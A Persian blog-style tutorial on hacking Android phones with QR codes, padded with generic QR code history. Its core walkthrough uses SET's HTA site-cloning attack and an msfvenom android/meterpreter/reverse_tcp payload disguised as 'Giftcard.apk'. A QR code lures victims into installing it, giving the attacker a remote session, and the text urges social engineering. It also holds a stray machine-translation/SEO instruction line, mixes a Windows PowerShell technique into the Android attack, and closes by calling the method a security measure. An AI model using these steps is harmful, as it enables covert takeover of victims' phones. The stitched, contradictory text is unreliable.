هک گوشی اندروید با استفاده از کد کیوآر (کد QR)

با اجازه‌ی شما، می‌خواهم با یک اخطار آغاز کنم: روشی که قصد دارم توضیح دهم یکی از چندین روش موجود است. ین روش به‌طور کامل خودکار نیست و نقشی در این فرآیند دارد. به همین دلیل، مهندسی اجتماعی جزء حیاتی آن است. مهندسی اجتماعی برای هک به فرآیندی اشاره دارد که در آن مهاجمان با بهره‌گیری از تکنیک‌های مهندسی اجتماعی، سعی در کسب دسترسی به اطلاعات حساس یا نفوذ به سیستم‌های کامپیوتری دارند. این تکنیک‌ها شامل ارتباط با افراد، فریب‌های اجتماعی و استفاده از روانشناسی افراد می‌شوند. همچنین، این روش ممکن است بر روی همه دستگاه‌های اندرویدی به‌صورت موفقیت‌آمیز کار نکند. تنظیمات امنیتی، وجود نرم‌افزارهای ضد ویروس و مکانیزم‌های امنیتی ارائه‌شده توسط گوگل تنها چندی از موانع ممکن را برای حمله‌های موفق ایجاد می‌کنند.

بیشتر بخوانید:

• چگونگی هک اندروید با فرستادن لینک
•  معرفی ۲۰ برنامه هک گوشی اندرویدی
• گام به گام آموزش شروع کار با ابزار ترموکس برای هک گوشی‌های اندروید
• آموزش گام به گام هک گوشی با دانلود برنامه Hackode
• هک گوشی با کد ملی

کد QR چیست؟

کد پاسخ سریع یا کد QR یک نوع ماتریسی بارکد است که توسط شرکت ژاپنی Denso Wave ابداع شده است. این کد‌ها به شکل یک تصویر مربعی از الگوهای سیاه و سفید تشکیل شده‌اند که اطلاعات مختلفی را به صورت دیجیتالی ذخیره می‌کنند. عبارت QR نیز از اصطلاح “Quick Response” به معنای پاسخ سریع گرفته شده است، زیرا اطلاعات موجود در این کدها به سرعت توسط دستگاه‌های مختلف خوانده می‌شوند.

تاریخچه و ایجاد کد کیوآر

کد کیوآر در سال 1994 توسط شرکت Denso Wave اختراع شد. ابتدا برای پیگیری وسایل نقلیه در فرآیند تولید به‌کار می‌رفت، اما سریعاً برای استفاده‌های متعدد دیگر مورد استفاده قرار گرفت. این شرکت تولید کننده محصولات شناسایی خودکار و ربات‌های صنعتی بود که به دنبال ابداع یک روش سریع و مؤثر برای تبادل اطلاعات بود.

نحوه کار کد کیوآر

کدهای کیوآر به وسیلهٔ الگوهای مختلفی از ماژول‌ها (نقاط سیاه و سفید) تشکیل می‌شوند. هر کد کیوآر از یک مربع اصلی تشکیل‌شده است که اطلاعات درون آن قرار می‌گیرد. اطلاعات ذخیره‌شده در کد کیوآر به صورت دیجیتالی و باینری است و می‌توانند متن، لینک، اطلاعات تماس و غیره باشند.

کاربردهای کد کیوآر

کدهای کیوآر در زمینه‌های مختلفی از جمله تبلیغات، مدیریت محصولات، امنیت، اطلاع‌رسانی و… استفاده می‌شوند. این کدها می‌توانند بر روی محصولات، بلیط‌ها، کارت‌ها، بروشورها و حتی وسایل تبلیغاتی قرار گیرند. با اسکن کد کیوآر توسط دوربین تلفن‌هوشمند یا دستگاه‌های خواننده‌ی مخصوص، اطلاعات مختلفی مانند لینک‌ها، اطلاعات تماس، توضیحات محصولات و… قابل دسترسی می‌شوند.

باشه، متن را مطابق درخواست شما و بهینه‌سازی شده برای موتورهای جستجو (SEO) به زبان فارسی ترجمه می‌کنم:

دوستان عزیز، در این مقاله به شما اسپای۲۴ کامل را ارائه خواهیم داد که نشان می‌دهد چگونه افراد حمله‌کننده با استفاده از کد QR و تکنیک‌های حمله HTA تلفن‌های هوشمند اندرویدی را هک می‌کنند. برای انجام این کار، نیازمند استفاده از سیستم عامل کالی لینوکس خواهیم بود. ما فکر می‌کنیم که بسیاری از مردم با مفهوم کد QR آشنا هستند، بنابراین ما تمرکز خود را تنها بر روی توضیح تکنیک حمله HTA قرار خواهیم داد. پیش از ورود به موضوع اصلی، به بررسی این تکنیک خواهیم پرداخت.

حمله HTA چیست؟

روش حمله HTA به ما امکان می‌دهد یک سایت را کلون کنیم و از طریق فایل‌های HTA تزریق PowerShell را انجام دهیم. این فایل‌ها برای بهره‌برداری از قابلیت PowerShell مبتنی بر ویندوز از طریق مرورگر استفاده می‌شوند. این برنامه‌های کاربردی به زبان HTML ساده نوشته می‌شوند و به حمله‌کننده از راه دور دسترسی کامل به سیستم را ممکن می‌سازند. پسوند معمول فایل‌های HTA به .hta است.

بیایید به این موضوع نگاهی دقیق‌تر داشته باشیم! 😛

نصب وب‌ سرور آپا چی

این به عنوان یک وابستگی در همه‌چیزی که ابتدا دانلود می‌کنیم، ضروری است. به یک وب‌سرور برای میزبانی فایل مخرب HTA نیاز داریم، به همین دلیل از دستور زیر برای دانلود وب‌سرور آپاچی استفاده می‌کنیم.

apt install apache2

ابزار Social-Engineer Toolkit (SET)

Setookit در حالت پیش‌فرض در Kali Linux وجود دارد و این ابزار خودکار طراحی شده است تا بارگیری را ایجاد کرده و حمله‌های پیشرفته را انجام دهد. به راحتی می‌توانیم با استفاده از دستور زیر این ابزار را راه‌اندازی کنیم. پس از باز کردن ابزار، دکمه 1 را فشار داده و گزینه اول را انتخاب کنید.

git clone https://github.com/Pr0f3ssor/SETOOLKIT.git
cd SETOOLKIT
pip3 install -r requirements.txt
python setup.py

 1) Social-Engineering Attacks  
 2) Website Attack Vectors  
 3) Credential Harvester Attack Method  
 2) Site Cloner 

حالا دکمه 2 را فشار داده و گزینه دوم “Website Attack Vectors” را انتخاب کنید.

نزدیکی 😛 !! به مقصد رسیده‌ایم. فقط دکمه 7 را فشار داده و حمله HTA را انتخاب کنید.

حالا در اینجا سه گزینه دریافت می‌کنیم که از طریق گزینه اول تنها می‌توانیم الگوی پیش‌فرض را انتخاب کنیم، گزینه دوم به ما امکان کلون کردن هر برنامه وب را می‌دهد و می‌توانیم با انتخاب گزینه سوم الگوی وب سفارشی خود را وارد کنیم. در مورد ما، ما از گزینه دوم برای کلون برنامه وب استفاده خواهیم کرد.

حالا آدرس URL را وارد می‌کنیم که می‌خواهیم کلون کنیم و سپس آدرس localhost همراه با شماره پورت را وارد می‌کنیم.

خوب 😛 !! می‌توانید ببینید که نیازی به اضافه کردن تلاش‌های اضافی نداریم زیرا همه چیز به صورت خودکار انجام می‌شود.

ایجاد Payload اندروید

همزمان یک ترمینال جدید را باز کنید، به پوشه ریشه وب‌سرور آپاچی بروید و با استفاده از دستور داده‌شده در آنجا payload ایجاد کنید. پس از ایجاد payload، فایل “index.html” را با استفاده از دستور nano باز کنید.

cd /var/www/html/
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 R > Giftcard.apk
ls -l
nano index.html

حالا باید نام منبع “Launcher .hta” را به “Giftcard.apk” تغییر دهیم که با این نام ابتدا payload ایجاد کرده‌ایم.

ایجاد کد QR

حالا باید افزونه را در مرورگر کروم خود نصب کنید تا کد QR وب‌سرور خود را دریافت کنید. می‌توانید آن را از اینجا نصب کنید.

تنها کاری که باید انجام دهید، باز کردن آدرس IP وب‌سرور آپاچی خود در هر کجا، بر روی افزونه کلیک کرده و کد QR را که می‌توانید به قربانی ارسال کنید، دریافت کنید.

صبر کنید 😛 !! یک‌بار قربانی کد QR را که توسط حمله‌کننده ارائه شده است اسکن کند، بارگیری مخرب در دستگاه اندرویدی ظاهر می‌شود.

عالی 😛 !! و به محض اینکه قربانی بارگیری را دانلود و نصب می‌کند، ما جلسه meterpreter دستگاه او را دریافت می‌کنیم.

به همان شیوه، می‌توانید با استفاده از تکنیک‌های مهندسی اجتماعی و ایده‌های خود قربانی را فریب بدهید.

نکات امنیتی هنگام استفاده از کد QR برای هک گوشی

اگر قصد دارید از کد QR برای افزایش امنیت گوشی‌تان استفاده کنید، باید توجه داشته باشید:

• منبع معتبر: همواره اطمینان حاصل کنید که کد QR از منبع معتبری تولید شده است.
• اطلاعات کمتر: از کد‌های QR با اطلاعات کم‌تر استفاده کنید تا جلوگیری از اشتباهات امنیتی.
• بررسی قبل از اسکن: هرگز کد QR را بدون بررسی اسکن نکنید، به خصوص اگر از منبع ناشناخته‌ای تولید شده باشد.

نتیجه‌ گیری:

استفاده از کد کیوآر (QR) به عنوان یک روش افزایش امنیت گوشی اندرویدی می‌تواند بسیار مفید باشد. با رعایت نکات امنیتی و انجام مراحل مذکور، می‌توانید از امنیت دستگاه خود اطمینان حاصل کنید. همچنین، هرگز از اشتراک‌گذاری کد QR‌های حاوی اطلاعات محرمانه‌ای خودداری کنید.

پرسش‌های متداول

چگونه می‌توانم مطمئن شوم که کد QR از منبع امنیتی تولید شده است؟

بهتر است کد QR را تنها از منابع معتبر و اطمینان‌بخش دریافت کنید. از اسکن کد QR‌های ناشناخته اجتناب کنید.

آیا امکان دارد که کد QR من به صورت غیرمجاز استفاده شود؟

بله، اگر کسی به کد QR شما دسترسی پیدا کند، می‌تواند از آن به نفع خود استفاده کند. بهتر است هرگز کد QR حاوی اطلاعات حساس را به اشتراک نگذارید.

آیا اپلیکیشن‌های خواندن کد QR امنیت اطلاعات من را تامین می‌کنند؟

بیشتر اپلیکیشن‌های خواندن کد QR تلاش می‌کنند اطلاعات شما را محافظت کنند، اما باید از منابع معتبر و قابل اعتماد استفاده کنید.

آیا نیاز به نصب آنتی‌ویروس برای گوشی دارم؟

بله، نصب یک برنامه آنتی‌ویروس باعث افزایش امنیت دستگاه شما در برابر تهدیدات امنیتی مختلف، از جمله حملات کد QR، خواهد شد.

چگونه می‌توانم از دسترسی‌های اشتباهی به دوربین و میکروفون جلوگیری کنم؟

با اجازه‌نامه‌های دسترسی به دوربین و میکروفون در برنامه‌ها به دقت برخورد کنید و فقط به برنامه‌های معتبر دسترسی بدهید.

چگونه می‌توانم از اسکن کد QR از طریق دوربین جلوگیری کنم؟

می‌توانید از تنظیمات دستگاه خود استفاده کنید تا دسترسی دوربین به برنامه‌ها و وب‌سایت‌ها را محدود کنید.